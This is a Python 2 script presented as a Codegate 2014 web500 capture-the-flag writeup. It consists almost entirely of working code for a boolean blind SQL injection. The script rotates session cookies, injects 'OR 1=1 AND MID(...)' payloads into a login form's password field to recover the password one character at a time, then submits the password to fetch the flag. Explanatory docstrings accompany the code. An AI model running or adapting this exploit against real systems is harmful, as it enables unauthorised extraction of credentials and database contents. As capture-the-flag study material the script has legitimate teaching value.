
codegate@2014 - web500 writeup (blind SQL injection exploit, Python 2)

  1. #!/usr/bin/env python
  2. #Blind SQL injection Exploit version 1.0
  3. #Language: Python (2.6)
  4. #Author: gamma95
  5.  
  6. import os
  7. import sys
  8. import urllib2
  9. import struct
  10. import urllib
  11. import time
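print """
   Codegate@2014: web500 writeup
   https://twitter.com/xchym
   Usage: python web500.py "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php" "password" "mysql"
"""
# Exactly three arguments are required: target URL, column to extract and
# backend dialect.  Exit non-zero on misuse so a shell caller can tell it
# apart from a normal run (the bare exit() used before returned status 0).
if len(sys.argv) != 4:
    print "[+] Syntax Error"
    sys.exit(1)
url = sys.argv[1]        # injection endpoint (index.php of the challenge)
sql = sys.argv[2]        # column whose value is brute-forced, e.g. "password"
sqlserver = sys.argv[3]  # backend dialect; only "mysql" is implemented in execute()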
  23.  
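def _gen_new_session(base_url='http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/'):
    """Fetch ``base_url`` anonymously and return the session cookie it sets.

    Args:
        base_url: challenge front page; defaults to the hard-coded target so
            existing callers keep working.

    Returns:
        The ``name=value`` pair from the response's ``Set-Cookie`` header,
        ready to be sent back in a ``Cookie`` header.  Attributes such as
        ``path=/`` are stripped because a ``Cookie`` header carries only
        name/value pairs.

    Raises:
        RuntimeError: the response carried no ``Set-Cookie`` header.  The
            previous version returned ``None`` here, which the callers later
            sent on the wire as ``Cookie: None``.
    """
    usock = urllib2.urlopen(base_url)
    try:
        set_cookie = usock.info().get('Set-Cookie')
    finally:
        # always release the socket, even if the header lookup fails
        usock.close()
    if not set_cookie:
        raise RuntimeError('no Set-Cookie header received from %s' % base_url)
    return set_cookie.split(';', 1)[0].strip()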
  28.  
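def _get_flag(_session, _password,
              auth_url='http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/auth.php'):
    """POST the recovered password to ``auth_url`` and return the page body.

    Args:
        _session: value for the ``Cookie`` header (see ``_gen_new_session``).
        _password: candidate password, sent urlencoded as the ``password`` field.
        auth_url: login endpoint; defaults to the hard-coded target so
            existing callers keep working.

    Returns:
        The raw response body; the caller prints it as the flag.
    """
    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'Cookie': _session,
    }
    data = urllib.urlencode({'password': _password})
    response = urllib2.urlopen(urllib2.Request(auth_url, data, headers))
    try:
        return response.read()
    finally:
        # the old code leaked the connection until garbage collection
        response.close()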
  39.    
def encodeurl(string):
    """Return ``string`` with every space replaced by ``%20``.

    Only spaces are encoded; no other reserved character is touched.  The
    helper is not called anywhere in this listing.
    """
    return '%20'.join(string.split(' '))
  42.    
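def _probe(url, chuoi, session, user_agent):
    """Send one injected login attempt and return the response body.

    Args:
        url: injection endpoint (also sent as ``Referer``).
        chuoi: SQL fragment appended after ``123' `` in the ``password`` field.
        session: ``Cookie`` header value identifying the session to use.
        user_agent: ``User-Agent`` header value.

    Returns:
        The raw response body as a string.

    Exits the process with a message on any connection-level failure
    (``urllib2.URLError``/``HTTPError`` and ``socket.error`` are all
    ``IOError`` subclasses in Python 2).  The old bare ``except:`` also
    swallowed KeyboardInterrupt, so Ctrl-C printed "Connection error".
    No explicit ``Host`` header is set: urllib2 derives it from ``url``,
    which matches the old hard-coded value for the default target and is
    correct for any other target as well.
    """
    data = urllib.urlencode({'password': "123' " + chuoi})
    headers = {'User-Agent': user_agent, 'Referer': url, 'Cookie': session}
    req = urllib2.Request(url, data, headers)
    try:
        response = urllib2.urlopen(req)
    except IOError:
        print "[+] Connection error"
        exit()
    try:
        return response.read()
    finally:
        response.close()


def execute(url, sql, sqlserver):
    """Recover a column value by boolean-based blind SQL injection.

    Args:
        url: endpoint the injected ``password`` POST field is sent to.
        sql: column (or expression) whose value is extracted via
            ``MID(<sql>,1,i)``; ``"password"`` in the documented usage.
        sqlserver: backend dialect; only ``'mysql'`` is implemented.

    The value is brute-forced one position at a time, left to right: for
    the prefix found so far, every candidate in ``dic`` is sent as
    ``MID(<sql>,1,i)='<prefix><candidate>'`` and a response body containing
    ``"True"`` confirms it.  Extraction stops after 30 characters or when no
    candidate matches (end of value, or a character outside ``dic``).
    Finally the page returned by ``_get_flag`` for the recovered value is
    printed.  Exits the process on an unsupported backend or a connection
    error.

    Caveats (not verified against the target, derived from the payload):
      * ``dic`` is lowercase only; with MySQL's default case-insensitive
        collations the recovered value may differ in case from the stored one.
      * the ``\\`` candidate ends up as ``'<prefix>\\'`` inside the quoted
        literal and escapes the closing quote, so a backslash in the value is
        unlikely to be detected.
    """
    # Checked before any network traffic so a typo fails fast; the old
    # message pointed at argv[4] and advertised an mssql mode that does not
    # exist.
    if sqlserver != 'mysql':
        print "[+] argv[3] must be 'mysql' (only MySQL is implemented) !!! Plz check your input"
        exit()
    str1 = " OR 1=1 AND MID("

    # One fresh session per recovered character.  The original author notes
    # the challenge resets the password after roughly 120 requests on one
    # session; a single position needs at most len(dic) (= 56) probes, so
    # rotating per character stays well under that limit.  40 sessions cover
    # the 30-character maximum plus the final _get_flag call.
    session_pool = [_gen_new_session() for _ in xrange(40)]

    dic = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
           'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
           '0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
           '$', '.', '-', '_', '(', ')', '[', ']', '{', '}', '@', '=', '/',
           '\\', '|', '#', '?', '!', '<', '>']
    user_agent = ('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) '
                  'Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6')

    result = ""
    count = 0  # index of the session in use; always equals len(result)
    for i in range(1, 31):
        for line in dic:
            # Wire form of the password field:
            #   123' OR 1=1 AND MID(<sql>,1,<i>)='<result><line>' and '1
            chuoi = (str1 + sql + ',1,' + str(i) + ")='" + result + line
                     + "' and '1")
            print chuoi
            page = _probe(url, chuoi, session_pool[count], user_agent)
            if "True" in page:
                count = count + 1
                result = result + line
                print result
                break
        else:
            # every candidate was rejected for this position: stop extracting
            break
    print "[+]Done, The password is: " + str(result)
    print "[+]Flag: " + _get_flag(session_pool[count], str(result))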
  93.     ##############
  94.  
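# Entry point.  The ``if True: ... else: print "Not vul"`` wrapper that used
# to sit here was dead code: the else branch could never run, and no
# vulnerability check precedes the exploit.  Failures inside execute()
# (unsupported backend, connection error) terminate the process themselves.
print """
   [+] Sending Malicious Request
   [+] Plz wait ... :)
               """
execute(url, sql, sqlserver)
sys.exit(0)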